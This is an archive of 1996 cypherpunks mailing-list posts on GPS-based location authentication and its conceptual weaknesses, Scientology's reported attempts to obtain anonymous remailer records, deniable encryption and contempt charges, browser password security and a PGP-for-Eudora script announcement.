single network?  Don't X.25 networks need someone more "in charge" than
TCP/IP networks, or am I mixing up different layers on the OSI reference
model?  Which gives me an opportunity to post the only mnemonic that I
ever created:

Read from the bottom up:

(and) Anarchists  Application
Progressives      Presentation (back when it was Communication, it was Commies)
Socialists        Session
Trust             Transport
Never             Network
Departments       Data Link
Police            Physical

DCF


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMWvBIYVO4r4sgSPhAQHmegP/bPmRjFRpbczDfQTpTbfGgnLmuvWp6cBb
J62Rp/LW0tOnBOW4rrf/d88AUTlh4sesn1daxn+3LEL1zgSaZromjW6i+lRSK+cw
AkShAuuTJUwzG44Li473au5b32jhw6VK2ZMTcZBWAo2f4kl5zLOgpMwKM1Cb6s8b
/StrGFRLmd0=
=5gXR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jones <joneswr@fsg.prusec.com>
Date: Thu, 11 Apr 1996 06:36:08 +0800
To: cypherpunks@toad.com
Subject: Re: BoS: No matter where you go, there they are.
In-Reply-To: <199604091750.TAA13469@utopia.hacktic.nl>
Message-ID: <96Apr10.102406edt.35724@prufire1.prusec.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> Location-based System Delivers User
> Authentication Breakthrough
> 
> By Dorothy E. Denning and Peter F. MacDoran
> Copyright(c), 1996 - Computer Security Institute - All Rights Reserved
> Top - Help
> 
> Existing user authentication mechanisms are based on information the user
> knows (e.g., password or PIN), possession of a device (e.g, access token or
> crypto- card), or information derived from a personal characteristic
> (biometrics). None of these methods are foolproof. Passwords and PINs are
> often vulnerable to guessing, interception or brute force search. Devices
> can be stolen. Biometrics
> can be vulnerable to interception and replay.
> 
> A new approach to authentication utilizes space geodetic methods to form a
> time- dependent location signature that is virtually impossible to forge.
> The signature is used to determine the location (latitude, longitude and
> height) of a user attempting to access a system, and to reject access if
> the site is not approved for that user. With location-based controls, a
> hacker in Russia would be unableto log into a funds transfer system in the
> United States while pretending to come from a bank in Argentina.
> 
> Location-based authentication can be used to control access to sensitive
> systems, transactions or information. It would be a strong deterrent to
> many potential intruders, who now hide behind the anonymity afforded by
> their remote locations and fraudulent use of conventional authentication
> methods. If the fraudulent actors were required to reveal their location in
> order to gain access, their anonymity would be significantly eroded and
> their chances of getting caught would increase.
>

[SNIP]
 
> 
> How it works
> 
> International Series Research (Boulder, CO) has developed a technology for
> achieving location-based authentication. Called CyberLocator, the
> technology makes use of the microwave signals transmitted by the
> twenty-four satellite constellation of the Global Positioning System (GPS).
> Because the signals are everywhere unique and constantly changing with the
> orbital motion of the satellites, they can be used to create a location
> signature that is unique to a particular place and time. The signature,
> which is computed by a special GPS sensor connected to a small antenna, is
> formed from bandwidth compressed raw observations of all the GPS satellites
> in view. As currently implemented, the location signature changes every
> five milliseconds. However, there are options to
> create a new signature every few microseconds.
> 

[SNIP]

So what if WORST case:

So,  everyone starts using this system.  Especially the banks and exchanges.
And nothing goes wrong for a long time and we really start to rely on it.

What happens when one of the satellite gets hit by a meteor?  Telephone systems
can be re-routed.  Does the authentication system break down?  What if more
than one gets hit?  The earth passes close to the asteroid belt every so
often.  Thats why you can see shooting stars more often at certain times of
the year.

What if some country wanted to test out their new missile that knocks out
satellites and takes a shot at some of the GPS.  Obviously an act of war but
could they shutdown the world bank? So far we use satellites to route
information originating on terra ferma.  This would mean relying on data
originating from the satellite net to do business.  And more so relying on
data from more than one to come up with a computed value.

Have we never lost a satellite to a rock?  It doesn't even have to be a big
rock.  Just one moving at 100,000 mph.

What happens during solar flare storms.  Does the signal still make it
through?

Would the world buy into relying on a satellite system controlled by the USA?

The possibilities for new 007 episodes just multiplied.

RJ




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Sun, 14 Apr 1996 05:44:27 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Contempt charges
Message-ID: <Pine.SUN.3.91.960410101249.14133A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Message-Id: <199604100152.DAA25396@spoof.bart.nl>
> To: cypherpunks@toad.com
> From: anonymous@nowhere.goucher.edu (Senator Exon)
> Comments: Please report misuse of this automated remailing service to 
> <remailer-admin@remailer.nl.com>

Oooh... forged headers... forged to indicate they're coming from _my_ 
school. I wonder who _this_ could be... perhaps someone who has expressed 
anger at me on the list? Perhaps just a random choice? Perhaps me? (Not 
me, that I'll tell you...)

> Borrowing inspiration from May, a page from Scheier and some code from 
> Gutman...

Techniques from Detweiller, and lousy law from Jim Bell (I _wonder_ who 
might have posted this... :-) )

> Hard disk space being cheap now, Bob creates several distinct disk 
> partitions and uses Peter Gutman's Secure File System, or equivalent, to 
> encrypt all of them.
[ ... ]
>Practically, Bob cannot be forced to reveal the pass phrases to any 
>alleged remaining secret data, since this might not exist.  To further 
>encourage this belief Bob might associate innocous data with a first pass 
>phrase, mildly embarrasing data with a second, and so on, and then, after 
>revealing the first, gradually allow himself to be be coaxed into revealing 
>the second and disclose a third only after the rubber hoses came out.
>
>Since all of the partitions have similar content, no statistic should 
>reveal which is which.  Bob might have a bit refresher routine 
>periodically nibble read and rewrite the whole disk so that no 
>electronic characteristic exists that reveals record age.

Sure, this will effectively hide the data; so will a plain old encrypted 
partition...

>No doubt, a judge might whimsically keep Bob in jail for a while, trying 
>to assure that he has revealed all of the pass phrases, but the judge 
>can never be certain, even when Bob has disclosed everything.  This 
>situation creates doubt that Bob is in contempt, even when he is, and 
>makes a prison term relatively pointless, unless for revenge.

But that's what a contempt charge is _for_: "You're not treating me with 
respect, so I'm going to punish you." It might be described as being for 
a particular reason (ie supressing evidence), but each of those reasons 
ultimately boils down to lack of respect.

In addition, were I handing down (or prosecuting) the contempt charges, I'd 
claim that the statement (even if it was made in public) that the individual 
didn't know all the keys in the first place was a lie, and that, by repeating 
the lie, they were purjuring themself.

I am not a lawyer; however, I suspect that neither was the anonymous poster.

In fact, I think I have a pretty good idea of who it was: someone on the 
list who:

(1) Has recently been claiming that contempt charges were worthless, and that
    people should start ISPs, and pool money for insurance.

(2) Has (probably) used this technique (at least once) before to create the
    appearances of support for one of his/her ideas which really has no 
    support.

(3) Might _possibly_ be upset with me (due to the headers...)

I can't think of _anyone_ who meets THAT description, now can I? ;-)
Jon
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shelley thomson <sthomson@netcom.com>
Date: Thu, 11 Apr 1996 09:07:27 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: CoS supoenas records of all anonymous remailers? (Unverified)
In-Reply-To: <4lOlC8i00YUvAxX4Ar@andrew.cmu.edu>
Message-ID: <Pine.3.89.9604101026.A17584-0100000@netcom17>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 9 Apr 1996, Declan B. McCullagh wrote:

> [FWIW, Biased Journalism is a reasonably reputable source.  --Declan]


Thank you, Declan.  

Grady is a sharp guy and he spent hours with the church lawyers.  If he 
thinks this is likely to happen I would take the possibility seriously.  
I sent the note to Jim Warren because I thought the community should know 
of the possibility.  A little advance notice might enable someone to 
prepare a legal defense.  I hope that remailers will resist turning over 
their records even if there is no useful information in them.  

We'll probably know in a few days whether Grady's guess is correct.  

Meanwhile, if you are going to pass my letter around please snip the 
personal stuff.  

Shelley





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jwarren@well.com (Jim Warren)
Date: Thu, 11 Apr 1996 09:07:22 +0800
To: gnu@toad.com>
Subject: Re: Anonymous Remailer threat: Scientologists may subpoena anonymous remailerrecords?
Message-ID: <v02120d22ad91a456c038@[206.15.66.107]>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>Subject: Scientologists may subpoena anonymous remailer records
>Date: Tue, 09 Apr 1996 19:02:39 -0700
>From: John Gilmore <gnu@toad.com>
>
>I thought that most or all of the cypherpunk anonymous remailers don't
>keep records.  Not even on backup tapes.  The whole idea is that there
>aren't logs.  But maybe they have found some remailers that are
>non-cypherpunk.  ...


My understanding is that anon remailers come in two flavors:

All of then anonomize X's msg to Y before forwarding it to Y as being
"from" anonymous source, Z.

The first flavor keeps a record matching X with Z. This allows it to accept
responses to Z that it then re-matches and forwards back to X.

The second flavor simply forwards without retaining any matching records at
all.  Of course, this then prohibits responses to the original msg sender
via that remailer.

My understanding is that the most famous remailer, anon.penet.fi, is of the
first flavor -- and was raided by reps of the Church of Scientology,
several years ago, with a Finnish search warrant, and that this produced
some [much?] of the evidence against their opponent who had allegedly been
splattering COS copyrighted "works" all over the net.  (Interesting
application of private property rights -- protecting religious secrets.)

--jim

And ... if I were a surveillance-oriented government agency, I would insert
"watchers" at appropriate regional and national hubs that would routinely
and automatically monitor every message ever sent to every identified
remailer -- so as to protect against those evil whistle-blowers who dare to
expose such govt's arrogance, abuses and/or wrong-doing, and the one or two
vile terrorists who are stupid enough to use the net for communications
without using world-available uncrackable crypto (that are the U.S. govt's
official excuse for wanting to wiretap us all.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Thu, 11 Apr 1996 06:11:41 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <9604101822.AA1919@>
MIME-Version: 1.0
Content-Type: text/plain


>Location-based System Delivers User
>Authentication Breakthrough

>By Dorothy E. Denning and Peter F. MacDoran

Nice april fools article...  

After all, position information is nothing more than a particular
phase shift (time delay) between GPS data streams received
from the set of satellites overhead.  If I report the datastreams
received -- or information about them -- then someone can
calculate where I am.  (Indeed, there are GPS applications
where the device whose position is of interest doesn't actually
decode the GPS data, it merely reports what it receives to some
central data collection site, where the arithmetic is done.)

If I want to pretend to be somewhere else, all I have to do is
some simple geometry to calculate the time delays I want to
report, and then phase-shift the GPS streams from their
received position to where they would be at the other place.

Note that relying on the PP code (military code) in the GPS
stream is no help, since I don't need to be able to interpret
the PP stream in order to pretend to be elsewhere, I merely
need to know where I am and where I want to be, to insert
the right phase shift.

 paul

!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "Be wary of strong drink.  It can make you shoot at tax collectors
!  -- and miss!"
!                -- Robert A. Heinlein, "The Notebooks of Lazarus Long"
!                   in "Time Enough for Love"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 11 Apr 1996 09:57:04 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: questions about bits and bytes
In-Reply-To: <m0u736N-0008yBC@pacifier.com>
Message-ID: <Pine.ULT.3.92.960410115410.13427A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 10 Apr 1996, jim bell wrote:

> >Be careful writing code - sometimes a byte is -128 to 127 instead of 0
> >to 255. Also, there are machines (mostly old kinky ones) that use
> >bytes of sizes other than 8 bits.
>
> No, Bill, a "byte" has ALWAYS been 8-bits.

Not that it really matters, but you're wrong; if you're talking about an
asynchronous data stream, a byte is however many bits it takes to express
one character. If you're using ASCII, it's 8; if you're using Baudot, it's
5. If you're talking about data in computers, then I think you're right, a
byte is always 8 bits.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mirele@xmission.com
Date: Thu, 11 Apr 1996 10:31:25 +0800
To: cypherpunks@toad.com
Subject: Scientology harassing anon.penet.fi again!
Message-ID: <199604101848.MAA11645@xmission.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain



forwarded from rnewman@cybercom.net (Ron Newman):

Here's what Grady said to me in several messages.  Note that
they seem to be after anon.penet.fi again too.

(He has given me blanket permission to distribute his e-mail to me to
 anyone who may find it of use.)

-------
Date: Thu, 04 Apr 1996 08:52:38 -0800
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>

I've just received e-mail from:

kaj.malmberg@mallu.pp.fi (Kaj Malmberg)

The Poilice CID in Helsinki who is being pushed by the criminal cult yet
again to get a search warrant for Julf's anonymous remailer, claiming I
have been violating my injunction to post cult crap.

I told him that as usual the criminal cult is lying and that I gave him
and Julf explicit permission to investigate any or all of my posts I have
ever made through the remailer.

The criminal cult is trying to use the fact of my injunction to further
their own conspiracy theories.  South Africa, Finland, where does it end?

Grady

-------------
Date: Fri, 05 Apr 1996 07:41:25 -0800
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>
Subject: Re: Kaj Malmberg, Finland

At 10:11 AM 4/5/96 -0500, you wrote:

>Why did you give them this permission?  I think it sets a VERY bad
>precedent.  Chris Schafmeister was upset when I mentioned this
>on the IRC channel yesterday afternoon -- he thinks you're being
>too nice, polite, and cooperative for your own good.

I like to err on the side of openness. Each to their own I suppose.
Basically I trust Kaj to sense who is the criminal perpetrator in this
case. I also sent him the set of trial stipulations in the Snow White case
that ought to give him very interesting background on the criminal cult.

>In my opinion, Julf and the Finnish cop should Just Say No
>to the CoS.

He is still free to do as he wishes.

------------
Date: Tue, 09 Apr 1996 14:16:32 -0700
To: Ron Newman <rnewman@cybercom.net>
From: Grady Ward <grady@northcoast.com>
Subject: Re: a few more questions

No one was with me.

Total hours day one: 7.5
Total hours day two: 3.25 hours, as per order of Judge Infante. Also I
believe all american anonymous remailers will be subpoenaed for their
records as will all my ISPs, and contents of safety deposit box held as
evidence.

At 04:56 PM 4/9/96 -0400, you wrote:
>Was anyone with you (on YOUR side) at either day's deposition?
>
>How many hours total did you go each day?
>

--------
Date: Tue, 09 Apr 1996 19:37:57 -0700
To: Ron Newman <rnewman@cybercom.net>
From: Grady Ward <grady@northcoast.com>
Subject: Re: what is the latest regarding penet?

I don't know what's up today, but Julf wrote yesterday
to tell me that my id grady@northcoast.com had NOT
been used to go through his remailer.

No word on what the police are doing to subpoena his system,
if they are.

Grady

--------------
Date: Tue, 09 Apr 1996 22:57:26 -0700
To: rnewman@cybercom.net (Ron Newman)
From: Grady Ward <grady@northcoast.com>
Subject: Re: what is the latest regarding penet?


That is all he told me: that he could verify to authorities
that grady@northcoast.com had not used his remailer.

He didn;t mention anyone else or how he was helping the CID
with their inquiries.  Yes, you can put this datum on the web.

At 01:52 AM 4/10/96 -0500, you wrote:

>Was something else used to go through his remailer?
>
>Has he said anything in public about this?
>
>Should I post your message about it on my web site?


Grady Ward           |                   |
http://www.northcoast.com/~grady +1 707 826 7715      |                  
|
(voice/24hr FAX)     | 34877c8566839cb7  |
grady@northcoast.com | aeab8ec5e5ee97fe  |

--
Ron Newman             rnewman@cybercom.net
Web: http://www.cybercom.net/~rnewman/home.html





mirele@xmission.com
-----BEGIN GEEK CODE BLOCK-----
Version:  3.1
GAT d- s++ a C++ U P L E- W++ N++ o-- K++ w--- O++ PS++ PE-- Y+ PGP+ t 5
X-- R- tv-- b++ DI++ D++ G e++++ h+ r* x++
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Sun, 14 Apr 1996 03:07:49 +0800
To: stillson@ashd.com (Chris Stillson)
Subject: Re: WWW User authentication
In-Reply-To: <199604092100.QAA21158@bach.ashd.com>
Message-ID: <199604101707.NAA23185@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Chris Stillson writes:
> 
> At 11:58 4/9/96 -0400, Jeff Barber wrote:
> >Brian C. Lane writes:
> >
> >>   I just finished writing a cgi script to allow users to change their login
> >> passwords via a webpage. I currently have the webpage being authenticated
> >> with the basic option (uuencoded plaintext). MD5 would be nicer, but how
> >> many browsers actually support it?
> >
> >AFAIK, none.  I don't see how this would be helpful anyway.  If you 
> >MD5 the password, I won't be able to snoop the password off the wire,
> >but I can simply snoop the MD5 hash off the wire instead and since 
> >that's what your authentication check must now be against, what does
> >this buy you?

> Well, that isn't exactly how digest authentication works.
> In fact mister barber should figure out what he is talking about
> before saying anything.  But, you can't really use a hash function
> to send the new password.  

OK.  I suppose I deserved this -- I didn't make the leap from "MD5" to digest
access authentication.  I've studied up now.  Still, as you say, digest
authentication won't protect the password modification scenario.


> >>   When the user changes their password, the form sends their name, old
> >> password, and new password with it, in the clear. This is no worse than
> >> changing your password across a telnet connection, but I'd like it to be
> >> more secure, but useable by a large number of browsers.

> >Well, if you use SSL, it's useable by a "large number of browsers" since
> >Netscape has such a large share of the browser market.  And then all of
> >the things you're doing w.r.t. authentication are hidden, at least from
> >casual eavesdroppers and others too if you use more than the 40-bit option.
> >There's really no other choice to reach a large number of browsers.

> Once again mister barber is being an idiot.  netscape is not a "large number
> of browsers".

This, on the other hand, was both uncalled-for and incorrect.  Netscape
browsers certainly do account for a large majority of the total browsers.
If a solution doesn't work with Netscape, most people would agree that it
isn't "useable by a large number of browsers".  And, in any case, Netscape
is not the only browser to implement SSL.  Several other commercial
browsers also claim to support SSL and I have even heard that there is a
version of Mosaic that uses SSLeay.


>                He is right that ssl is probably a good way to go. (shttp would
> be better :) )

SHTTP might be better if it didn't have to be "useable by a large number
of browsers" -- since Netscape doesn't support SHTTP.  (I'm sorry that you
apparently find Netscape's success so frustrating, but it is a fact.)


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 11 Apr 1996 09:37:23 +0800
To: cypherpunks@toad.com
Subject: RSA_dog
Message-ID: <199604101708.NAA21887@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   IDC Government ("Better Government Through IT Research")
   has snail-mailed an 8-page report on the January 1996 RSA
   Data Security Conference on "The Future of Cryptography."

   For math hermits untracked by the RSA bloodhound:


   RSA_dog











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Thu, 11 Apr 1996 21:02:33 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: Scientologists may subpoena anonymous remailer records
In-Reply-To: <199604100202.TAA16568@toad.com>
Message-ID: <Pine.BSF.3.91.960410124929.11278D-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> I thought that most or all of the cypherpunk anonymous remailers don't
> keep records.  Not even on backup tapes.  The whole idea is that there
> aren't logs.  But maybe they have found some remailers that are

When a person recieves a message from someone using an anonymous 
remailer, the return address will usually work, depending on the 
remailer. The return address is for an address on the remailer, and 
sending to that address, the remailer will forward the message back to 
the person who owns that anonymous address.

The problem with that, of course, is that the remailer has to keep a 
record of who owns each anonymous account, so that it can direct the 
replies to the anonymous person. These records could be siezed.

Also (not related to the records), if the remailer does not encrypt the 
replies that it forwards to the anonymous owner, it would be *very* 
vunlerable to traffic analysis... Just watch for your message leaving the 
remailer, and see the address of the anonymous person, or the address of 
the next remailer in the chain.

I don't really know much about remailers, but I don't think there's much
to know... If I'm mistaken about any of the above, I'm sure someone will
correct me. 

BTW, has anyone out there created an anonymous web forwarder? I'm sure 
there are a lot of people out there who don't like the idea of having 
their email address in the log files of dozens of web servers... Creating 
a simple web forwarder wouldn't be hard.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 12 Apr 1996 02:46:04 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: questions about bits and bytes
Message-ID: <m0u77OB-0008yfC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 PM 4/10/96 -0700, Rich Graves wrote:
>On Wed, 10 Apr 1996, jim bell wrote:
>
>> >Be careful writing code - sometimes a byte is -128 to 127 instead of 0
>> >to 255. Also, there are machines (mostly old kinky ones) that use
>> >bytes of sizes other than 8 bits.
>>
>> No, Bill, a "byte" has ALWAYS been 8-bits.
>
>Not that it really matters, but you're wrong; if you're talking about an
>asynchronous data stream, a byte is however many bits it takes to express
>one character. If you're using ASCII, it's 8; if you're using Baudot, it's
>5. If you're talking about data in computers, then I think you're right, a
>byte is always 8 bits.
>-rich

What's the old saying, "Those of you who think you know everything are very 
irritating to those of us who do."

First off, serial binary formats for transmitted data are at least as old as 
the 1930's, and the term "byte" was coined in the early-middle 70's, as I 
recall.  Therefore it is highly unlikely (and, in fact, wrong) that the term 
"byte" referred specifically to serial binary streams.  

In fact, the term "character" is the word used to describe a serial data 
object composed of bits.  The length of that character can vary:  As any ham 
knows (or ought to know!) many early teleprinters used a so-called 5-level 
(5 bits per character; there were shift characters inserted to multiply the 
available codes) code called Baudot, while more recent ones used the 
now-common, 7-bit ASCII code.  A typical ASCII asynchronous character is 
transmitted using a start bit, seven or eight data bits, an optional parity 
bit, and one or more stop bits (usually 1, today, but it can be 1.5 or 2.)

Jim Bell
jimbell@pacifier.com





 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 11 Apr 1996 09:16:17 +0800
To: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Subject: Re: No matter where you go, there they are.
In-Reply-To: <9604101822.AA1919@>
Message-ID: <199604101740.NAA05885@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com writes:
> >Location-based System Delivers User
> >Authentication Breakthrough
> 
> >By Dorothy E. Denning and Peter F. MacDoran
> 
> Nice april fools article...  

Alas, Dorothy Denning et al think its real.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Thu, 11 Apr 1996 12:48:12 +0800
To: cypherpunks@toad.com
Subject: RC4 on FPGAs (Was: Bank transactions on Internet)
In-Reply-To: <199604091732.KAA29261@netcom9.netcom.com>
Message-ID: <4kh71n$cl3@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Coincidentaly enough, this is part of my project for my Hardware class.
I'll let you know when I have it working.  I'm using Altera FLEX 81188s,
though the 10K models (with built-in RAM) would be _way_ faster...

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Fri, 12 Apr 1996 02:32:04 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: No matter where you go, there they are.
Message-ID: <v02140b02ad91db64cd39@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:53 AM 4/10/96, Hal is rumored to have typed:
> Peter - didn't they say that the checking station is also listening
> to the satellites?  That way they can tell that you are playing back
> signals that you taped earlier because they won't match what the
> satellites are broadcasting right now.

There is going to be processing and network delay involved here (unless
Denning et al have figured out some way to communicate faster than the
speed of light), so drift between the what you report and what the checking
station and repeaters are hearing _at that time_ is inevitable.  This is the
loophole which allows  Peter's attack, a loophole which cannot be closed
(because the spoofer can always claim to be on a slower link than she
really is and there is nothing the verifiyer can do to prove otherwise.)
If I want to pretend to be closer to the receiver than my true location I
simulate a slow link which gives me enough time to record what the signals
would be at the near location and then quickly resend them to give the
appearance of the spoofed location.

In fact, I think that this really all boils down to trying to use GPS
as a non-interactive proof of location, and the information posted about
the system does not address the obvious attacks on such systems which
are known from research into ZNPs.

> If their authenticated repeaters are used then you have to assume the
> checking station has all the satellite signals and again the best you can
> do is pretend to be a Mole Man.

The authenticated repeaters may collect all signals, _but the receiving
station does not get them all at once_ because it will take time for
the signals to propogate from the repeater back to the station attempting
to determine location. Having all of the signals does not help the
checking station other than allowing it to share a set of sats with
the person attempting to authenticate.  It still does not

And perhaps more importantly, do you really want anyone you connect to
on the net to know your location to the nearest 10 meters?  What is
Dennings fascination with building Big Brother?

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 11 Apr 1996 11:04:55 +0800
To: cypherpunks@toad.com
Subject: Bank information protected by 40-bit encryption....
Message-ID: <9604101921.AA25061@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



If you are the worring sort (or are looking for a ripe target)
point your browser at:
    https://www.diginsite.com/clients.html

There is a list of 23 Credit Unions - some (or all) of which
allow transactions to be done over the net.

A brief once over shows that it requires Netscape 2.0 or 
better so you will have encryption, but it does not warn you 
when you are using only a 40-bit session key vs. a 128-bit key.
(Netscape wizards - is there a way that the server can detect
 this so that a warning message could be put up?)

They also have some other information about their security at:
   http://www.diginsite.com/security/security.html

I think it is GREAT that this kind of functionality is coming.
I also think that the pioneers like this had better be prepared
to be targets as I am sure they will be.

Dan

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 14 Apr 1996 04:50:06 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: PEP Announcement (fwd)
Message-ID: <Pine.SUN.3.91.960410142613.9112A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



This showed up in my mailbox:

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information

---------- Forwarded message ----------
Date: Wed, 10 Apr 1996 00:03:29 -0400
From: Amos Elberg <aelberg@wesleyan.edu>
To: unicorn@schloss.li
Subject: PEP Announcement

Uni, can you forward this to the c-punks for me?

---------
PEP: Pretty Easy Privacy, a set of scripts for OneClick that integrate
Eudora and MacPGP are now available in the latest Button Circle release at:
<ftp://ftp.westcodesoft.com/pub/westcode/Contributions/OCButtonCircleMarch96.sit
.hqx>

PEP is designed to provide features similar to the UNiX premail program on
the Macintosh. It handles encryption, decryption, signing, verifying,
anon.penet.fi remailing and cypherpunk remailing.

PEP uses OneClick to place a button bar in Eudora, from which the user can
select privacy functions. Buttons pop-up menus of encryption targets,
signature keys and cypherpunk remailers.

Q: What do I do about the rest of MacPGP's interface?
A: PEP is not designed to replace MacPGP, just to provide easier access to
it from within Eudora. For a full featured MacPGP GUI replacement with
added features, try Raif Naffah's MacPGPControl application.

Q: Isn't the name 'PEP' pretentious and derivative?
A: Yes, I think so too. I couldn't think of a better one. Suggestions are
welcome.

Q: I have a lot more questions. Where are the answers?
A: In the documentation. If you have any more questions, please direct them
to <mailto:aelberg@wesleyan.edu>

------------------------------------------------------------------------------
Amos B. Elberg                       | #include disclaimer.h  Amos will
code for
Wesleyan University                  | food. E-mail me for a resumé. Please.
341 S. Main St. Apt. 3N              |----------------------------------------
Middletown, CT 06459                 | Help keep the net safe from the
Will Code for Food!                  | aesthetically challenged. Please,
Public keys available from the usual | oppose ASCII art.
keyservers, or by request.           |----------------------------------------
PGP fingerprint =  08 B8 87 04 6B 21 08 5D  B0 62 F7 94 7B 42 0F 10

--- end forwarded text





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rick hoselton <hoz@univel.telescan.com>
Date: Thu, 11 Apr 1996 15:21:51 +0800
To: cypherpunks@toad.com
Subject: Re: No matter where you go, there they are.
Message-ID: <199604102136.OAA12316@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:04 AM 4/10/96 -0400, Peter Wayner wrote:
>
>Hmm. Here's an interesting question.  Let's say that there are 3
>satellites in view broadcasting signals f1(t), f2(t) and f3(t).
>...Okay, so why can't I just tape the signals I get from each of
>the three satellites. 

>Or course, I could be completely missing some neat feature of
>DGPS. ... Any thoughts?

I have read that GPS uses encryption to place time-dependent, 
location-dependent inaccuracies into the signals.  Innacuracies 
small enough so they are not a problem for civilian navigation, 
(mostly) but large enough to prevent GPS from being a useful method 
of military targeting for anyone who does not hold the keys.

Perhaps Ms. Denning is suggesting that the US feral government could 
act as a "trusted server" (and she has repeatedly suggested such trust) 
and tell us whether a GPS that "thinks" it's at some location, right now, 
is REALLY at some known location.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Byrd <byrd@ACM.ORG>
Date: Thu, 11 Apr 1996 11:09:55 +0800
To: cypherpunks@toad.com
Subject: CoS and anon remailers
Message-ID: <2.2.32.19960410184928.00688328@tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Here's more details.  For quite some time the Church of Scientology has been
pestered by an anonymous poster "Scamizdat" who regularly has been spilling
cult secrets onto the net.  These include directions on how to harrass
critics. Scamizdat (whoever he is or they are) appears to have been using
anonymous chained remailers.

Grady Ward, a critic of the cult, has been taunting the cult with "Have you
stopped Scamizdat yet?"  I believe that Grady is almost certainly NOT Scamizdat.

The church appears to have concluded that Grady is Scamizdat, has sued him,
applied for a writ of seizure to raid his house (denied), and asked for a
deposition (granted).

It appears that Scientology is interesting in getting into the records of
American anon remailers.  They are also interested in anon.penet.fi.  Once
before, they raided anon.penet.fi when some of their internal information
leaked out onto the net, and that poster has never been heard from again.

Someone asked if this wouldn't violate the ECPA.  In the past the cult has
seized whole computers, complete with email, and ignored court orders to
return them.

The whole story may be found on
http://www.cybercom.net/~rnewman/scientology/home.html

Here is a file I got from Ron Newman's web page:

---------------


Article 78833 of alt.religion.scientology:
